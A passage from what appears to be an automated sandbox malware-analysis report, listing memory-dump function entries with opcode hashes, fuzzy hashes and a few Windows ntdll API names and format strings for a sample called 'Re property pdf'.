                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 734f4c77731499af7ec1d54afcfeae8b926eca41caabd89d650eee6beccae1ba
                                                                                                                              • Instruction ID: 1cec38c25e35761576297e6568f76c1bd7bacd0264689847310671b4217b054c
                                                                                                                              • Opcode Fuzzy Hash: 734f4c77731499af7ec1d54afcfeae8b926eca41caabd89d650eee6beccae1ba
                                                                                                                              • Instruction Fuzzy Hash: 73F0F0719026D59EF7638F2CC004B69BBC49B00A21F084CEAD7C9C3582C3B4DB80C708
                                                                                                                              Function 010C0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e5dc9bd8e93c2923b75060d54fe3e9a3f74bcefa95a701920b4b3b3adf17824
                                                                                                                              • Instruction ID: 04a7ccacf4ed87364e91c959fc69e4b3dfae8576f11f1b7ec219dea9300a6d8a
                                                                                                                              • Opcode Fuzzy Hash: 2e5dc9bd8e93c2923b75060d54fe3e9a3f74bcefa95a701920b4b3b3adf17824
                                                                                                                              • Instruction Fuzzy Hash: 6FF0273A41A68586CF726B2CA8A23D9AB98E781910F0910CDECE05760DC57B8483CB20
                                                                                                                              Function 0103C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0eef3c045ffd9adcb5000ce5ddfb8ba32dcfe04ee396a3d2de76bc2d2c5abdc6
                                                                                                                              • Instruction ID: eb177211407c5c9ea66a7387a24e67a916179d7dd09c5479923b44156260b87b
                                                                                                                              • Opcode Fuzzy Hash: 0eef3c045ffd9adcb5000ce5ddfb8ba32dcfe04ee396a3d2de76bc2d2c5abdc6
                                                                                                                              • Instruction Fuzzy Hash: E7F052754012809FF3A2971CC708B51BBDCAB887A0F0C94A7D5C2D3522C770E880DA40
                                                                                                                              Function 01042619 Relevance: .0, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction ID: 4fa78ebbd7061b80450022f06fade9589453f9bb04727cb92096e0e0e2737a0a
                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction Fuzzy Hash: FCE0D8723006016BE7119F599CC4F877BAEDFDAB10F040079B5045F251C9E6DC0986A4
                                                                                                                              Function 01096030 Relevance: .0, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction ID: fb069ca7613eb8b86db636f7b8715764c3c02b99cfd8ce0da888ef620f381c11
                                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction Fuzzy Hash: 3AF0A0721002049FE7208F09DD80F53BBF8EB85364F01C066F6488B160D33AEC40DBA0
                                                                                                                              Function 01000710 Relevance: .0, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction ID: edc4b0be45610bd4b53950be2d7d052bb9d27ae0c2ea442670d26ab41dc5979b
                                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction Fuzzy Hash: 3DF0E5396047459BEB57DF19D040ADA7BE4FB413A0F000094FCC68B341D735EA82CB50
                                                                                                                              Function 010349D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction ID: 43d460af8dec5c3aa149e26ec4424270cbaa0809aa5eef62e8308a57fb813652
                                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction Fuzzy Hash: BFE0D832244945ABD3211A598800B6A7BEDEBD57A0F150429E280CF150DB74DC42C7D8
                                                                                                                              Function 010D4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1d9fbe803c756854a15087165de64eacbef8fe775bd65829ab8154ed107923a4
                                                                                                                              • Instruction ID: bdb3df54ee29d282843dc4f5de1d6c9788edee64b4cf36d2ac4a20fe45e6ffe6
                                                                                                                              • Opcode Fuzzy Hash: 1d9fbe803c756854a15087165de64eacbef8fe775bd65829ab8154ed107923a4
                                                                                                                              • Instruction Fuzzy Hash: 39F0A939A26B918FE7A2D738E2A0B9677E0AB10620F0E05A4D490C7E12C334EC80CA50
                                                                                                                              Function 010A678E Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction ID: 7b4044ecbf329017604fa8df8a41fc2ff723f32b885bb8d02848c16cf3f69520
                                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction Fuzzy Hash: 25E0DF32A00120BBDB21A7998D05F9ABEBCEB94FA0F090054B600EB0E0E531DE00C6D0
                                                                                                                              Function 010D08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                              • Instruction ID: db5cdd197e53625a4a77d064504b1a9ef2a6e55402189bdb21b3d43d7e9c137a
                                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                              • Instruction Fuzzy Hash: 06E09B316403518BCB259A1DC141A97BFE8DF95660F1580ADE9DD47616C271F842C6D0
                                                                                                                              Function 010025E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 344d47e5801ba75f51cc8e63cb3e68d11a321407554196272a3bd658d309a3df
                                                                                                                              • Instruction ID: 1e70910881921cb7758119d3131569722fd73bd038e88adc5f62c16e3afedc77
                                                                                                                              • Opcode Fuzzy Hash: 344d47e5801ba75f51cc8e63cb3e68d11a321407554196272a3bd658d309a3df
                                                                                                                              • Instruction Fuzzy Hash: BEE092721009549BC322FB29DD01FCA779AEB64360F014529B19597190CA35A810C7C8
                                                                                                                              Function 010BA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction ID: 256b2fdd617d8c37c24fa6a71f0c9d4d6348a5018ba3b7a43a1b949f36c91b47
                                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction Fuzzy Hash: 79E09231110A11DFE7326F2AD988BD27AE0BF90711F148C6DE0D6124B0CBB898C0CA40
                                                                                                                              Function 01084000 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction ID: 022e909fa5f7c7dc2dc2b5fb851c14c6b87766875dba4677378692f3ed4da3bb
                                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction Fuzzy Hash: B0E0AE343043068BE755DF19C044B627BA6BFD5A10F28C0A8A9888F305EB32A8438A40
                                                                                                                              Function 00FF823B Relevance: .0, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                              • Instruction ID: 51ae193022650204183601d2081a6e5490bebb98f2679a839624d13943c78982
                                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                              • Instruction Fuzzy Hash: 11E08632500918EFD7312E15DC40BA176A1FF54BA0F204829F1C1060748B747C82EB44
                                                                                                                              Function 01002050 Relevance: .0, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 89a4647917e4a5fff9003d71512ea31355477b5456c9be4068268570aa4f678e
                                                                                                                              • Instruction ID: 1a1ee52695be01ce1f1a29ed082e95037b489e7c7258b84367c820e11f3811f7
                                                                                                                              • Opcode Fuzzy Hash: 89a4647917e4a5fff9003d71512ea31355477b5456c9be4068268570aa4f678e
                                                                                                                              • Instruction Fuzzy Hash: 04E0C232100454ABC312FB5DDD01F8A739EEFA8370F000125F1908B6D4CA25AC00C798
                                                                                                                              Function 01038A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                              • Instruction ID: a364b79eebeb8a55fa361d3883f6a7fa1c391b8558b1dbcac693cf208bc9ab75
                                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                              • Instruction Fuzzy Hash: 52E08633111A1487D729DE18D511B7677E8EF85720F09877EA65387780C534E544C794
                                                                                                                              Function 01056AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                              • Instruction ID: 31e036b29e7e8cb1e062dbc533002a838b3b2086b63411f3c6ce51dad9024248
                                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                              • Instruction Fuzzy Hash: DBD05E36511A50AFD3729F1BEA00C53BBF9FBC4A20705066EA58583924C671AC06CBA0
                                                                                                                              Function 0103E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                              • Instruction ID: d29f6d0c602169a1bcc5b23d078d193626ffde5152a830c83a5846fcbe80eacf
                                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                              • Instruction Fuzzy Hash: 39D0A932604664ABD772AA1CFC00FC333E8BB88730F060499B048CB060C364AC82CA88
                                                                                                                              Function 0107E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                              • Instruction ID: f2b9db52e507c0829a182c377849c152526c37f48f87513b2cf45e625bad5b80
                                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                              • Instruction Fuzzy Hash: E9E0EC36951684ABDF52DF59C640F9ABBF9BB94B40F150498A1886B660C624A900CB40
                                                                                                                              Function 00FFA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                              • Instruction ID: 7a21e868c96d05f326ed6be058b322005c00808f47d235756fd72654f8f25299
                                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                              • Instruction Fuzzy Hash: A0D0223321603893CB2857616800FB37905EF80BA0F1A002C350E93910C4088C42E6E0
                                                                                                                              Function 0103A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                              • Instruction ID: 4087574e7147c72c6b02e5eb67c226733cc5257b4ad1f3b3fb31a7216ceadfb3
                                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                              • Instruction Fuzzy Hash: 93D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B5048B5A0D63AE950D684
                                                                                                                              Function 0103CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fbdf6f3ffc42c590840d0db64cd067ab6b39c1678aa558d0a24730d20775883f
                                                                                                                              • Instruction ID: dc56536a59b16243961e024de3d31386e7d5a925fd55e310951a29d8e4419005
                                                                                                                              • Opcode Fuzzy Hash: fbdf6f3ffc42c590840d0db64cd067ab6b39c1678aa558d0a24730d20775883f
                                                                                                                              • Instruction Fuzzy Hash: 84D0A734D01449CBEF17DF08C618D6E36F4FB54640B4000ADE7C0A2420E72ADC02C700
                                                                                                                              Function 010102A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                              • Instruction ID: 18847098a5d0c970b0333a007b04b5240ab75a346aeb2267bc10791a276468cb
                                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                              • Instruction Fuzzy Hash: B6D0C935312E80CFD65BCB0CC5A4B5533E8BB44B44F8144D0F481CBB2AD62CD980CA00
                                                                                                                              Function 0103C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction ID: 9aff8eaeb19cf3f80f5241ec92c1723ff2f1b28db75a38da61261eaa3cee6f60
                                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction Fuzzy Hash: 4FC01232290648AFC712AA99CD01F427BA9EBA8B50F000021F2048B670D635E820EA84
                                                                                                                              Function 01020310 Relevance: .0, Instructions: 11COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction ID: a8a0918c099161883d89b1ee381b2df01208f1671ae1b3bb64ed315f40356f9f
                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction Fuzzy Hash: 62D01236100248EFCB01DF41C890D9A772AFBD8710F108019FD19076108A31ED62DA90
                                                                                                                              Function 01000750 Relevance: .0, Instructions: 9COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction ID: 2f4d67c7a5a338cc334929ddcaa2820062c2ebb1e0f97d6d42d75f8289443e0a
                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction Fuzzy Hash: 2CC04C797015458FCF55DB19D294F4677E4F744750F1508D0E985CB721E624E901CA10
                                                                                                                              Function 01042890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 47edde6a9ede95ec09698f94d06628519bcac058df7fdfa37677d119c9c55eb3
                                                                                                                              • Instruction ID: 84230cc08c04a90e863ed86b6691df3af8f5774d5479452f223311cd5fa027fc
                                                                                                                              • Opcode Fuzzy Hash: 47edde6a9ede95ec09698f94d06628519bcac058df7fdfa37677d119c9c55eb3
                                                                                                                              • Instruction Fuzzy Hash: 6951A3F6B04116ABDB51DB9C98D097EFBF8BB48240B148269F5E5D7642D334EE408BA0
                                                                                                                              Function 010B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 0615047b674ab484b81f8c1f59c7d5d536c7ed587245f13c53b3ed13802e1734
                                                                                                                              • Instruction ID: 5e5c714c26b5cd6d868402dfd08a0ef281b999fd8aaaeb7293d617a1e10e6150
                                                                                                                              • Opcode Fuzzy Hash: 0615047b674ab484b81f8c1f59c7d5d536c7ed587245f13c53b3ed13802e1734
                                                                                                                              • Instruction Fuzzy Hash: C651E571A00645AECB64DE5CC8D09BFB7F9AF44300B448459E5D6D7681EB74FA40C760
                                                                                                                              Function 01037630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01074655
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01074787
